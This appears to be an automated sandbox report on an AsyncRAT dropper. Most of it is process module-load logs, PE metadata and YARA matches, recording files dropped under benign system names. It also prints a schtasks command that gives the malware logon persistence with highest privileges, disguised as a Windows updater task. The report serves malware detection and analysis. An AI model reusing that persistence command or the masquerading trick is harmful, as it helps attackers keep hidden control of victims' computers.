                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: msasn1.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                        Source: C:\Users\user\AppData\Local\explore.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Local\explore.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\explore.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\explore.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Local\explore.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\explore.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\explore.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\explore.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\explore.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\explore.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Local\explore.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Local\explore.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\explore.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\explore.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Users\user\Desktop\rrats.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: rrats.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                        Source: rrats.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                        Source: rrats.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                        Source: rrats.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: rrats.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                        Source: rrats.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                        Source: rrats.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                        Source: rrats.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: rrats.exe
                        Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxzip32\Release\sfxzip.pdb source: rrats.exe, 00000000.00000003.2025471553.0000000007875000.00000004.00000020.00020000.00000000.sdmp, a.exe, 00000004.00000000.2030069537.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp, a.exe, 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp, a.exe.0.dr
                        Source: rrats.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                        Source: rrats.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                        Source: rrats.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                        Source: rrats.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                        Source: rrats.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                        Source: C:\Users\user\Desktop\rrats.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_6344500Jump to behavior
                        Source: Explorer.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x18937
                        Source: a.exe.0.drStatic PE information: real checksum: 0x50eb0 should be: 0x5acc5
                        Source: rrat.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x18937
                        Source: explore.exe.16.drStatic PE information: real checksum: 0x0 should be: 0x18937
                        Source: rrats.exeStatic PE information: real checksum: 0x4fdb3 should be: 0x886c1
                        Source: rrats.exeStatic PE information: section name: .didat
                        Source: a.exe.0.drStatic PE information: section name: .didat
                        Source: C:\Users\user\Desktop\rrats.exeCode function: 0_2_00CBD443 push FFFFFFD0h; retf 0_2_00CBD445
                        Source: C:\Users\user\Desktop\rrats.exeCode function: 0_2_00CBF640 push ecx; ret 0_2_00CBF653
                        Source: C:\Users\user\Desktop\rrats.exeCode function: 0_2_00CBEB78 push eax; ret 0_2_00CBEB96
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeCode function: 4_3_02FB485A push eax; retf 4_3_02FB488D
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeCode function: 4_3_02FB485A push eax; retf 4_3_02FB488D
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeCode function: 4_3_02FB485A push eax; retf 4_3_02FB488D
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeCode function: 4_3_02FB485A push eax; retf 4_3_02FB488D
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeCode function: 4_2_00E93A94 push eax; ret 4_2_00E93AB2
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeCode function: 4_2_00E947D0 push ecx; ret 4_2_00E947E3
                        Source: rrat.exe.4.dr, rIsDkswHsqEa.csHigh entropy of concatenated method names: 'bEXarVuKQzAhOus', 'KZMgyydrmWaa', 'fZFJNQMngFoEAwE', 'GrDQmWWEvDEvbiZVB', 'gnljKRkooXxGi', 'IVGTCPMGlMs', 'EpqmIhkFeAF', 'YleZeIYkYW', 'AbYVWBHerNIoy', 'lFfOfPSqLDq'
                        Source: Explorer.exe.5.dr, rIsDkswHsqEa.csHigh entropy of concatenated method names: 'bEXarVuKQzAhOus', 'KZMgyydrmWaa', 'fZFJNQMngFoEAwE', 'GrDQmWWEvDEvbiZVB', 'gnljKRkooXxGi', 'IVGTCPMGlMs', 'EpqmIhkFeAF', 'YleZeIYkYW', 'AbYVWBHerNIoy', 'lFfOfPSqLDq'
                        Source: 5.2.rrat.exe.26db1a0.0.raw.unpack, rIsDkswHsqEa.csHigh entropy of concatenated method names: 'bEXarVuKQzAhOus', 'KZMgyydrmWaa', 'fZFJNQMngFoEAwE', 'GrDQmWWEvDEvbiZVB', 'gnljKRkooXxGi', 'IVGTCPMGlMs', 'EpqmIhkFeAF', 'YleZeIYkYW', 'AbYVWBHerNIoy', 'lFfOfPSqLDq'
                        Source: explore.exe.16.dr, rIsDkswHsqEa.csHigh entropy of concatenated method names: 'bEXarVuKQzAhOus', 'KZMgyydrmWaa', 'fZFJNQMngFoEAwE', 'GrDQmWWEvDEvbiZVB', 'gnljKRkooXxGi', 'IVGTCPMGlMs', 'EpqmIhkFeAF', 'YleZeIYkYW', 'AbYVWBHerNIoy', 'lFfOfPSqLDq'

                        Persistence and Installation Behavior

                        barindex
                        Drops PE files with benign system names
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeFile created: C:\Users\user\AppData\Roaming\Explorer.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeJump to dropped file
                        Source: C:\Users\user\Desktop\rrats.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeFile created: C:\Users\user\AppData\Roaming\Explorer.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeFile created: C:\Users\user\AppData\Local\explore.exeJump to dropped file

                        Boot Survival

                        barindex
                        Yara detected AsyncRAT
                        Source: Yara matchFile source: 5.0.rrat.exe.200000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.rrat.exe.26db1a0.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.rrat.exe.26db1a0.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.2089096502.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: a.exe PID: 1372, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rrat.exe PID: 1968, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Explorer.exe PID: 7356, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\explore.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Explorer.exe, type: DROPPED
                        Uses schtasks.exe or at.exe to add and modify task schedules
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Windows\WindowsUpdater" /tr '"C:\Users\user\AppData\Roaming\Explorer.exe"'

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Loading BitLocker PowerShell Module
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
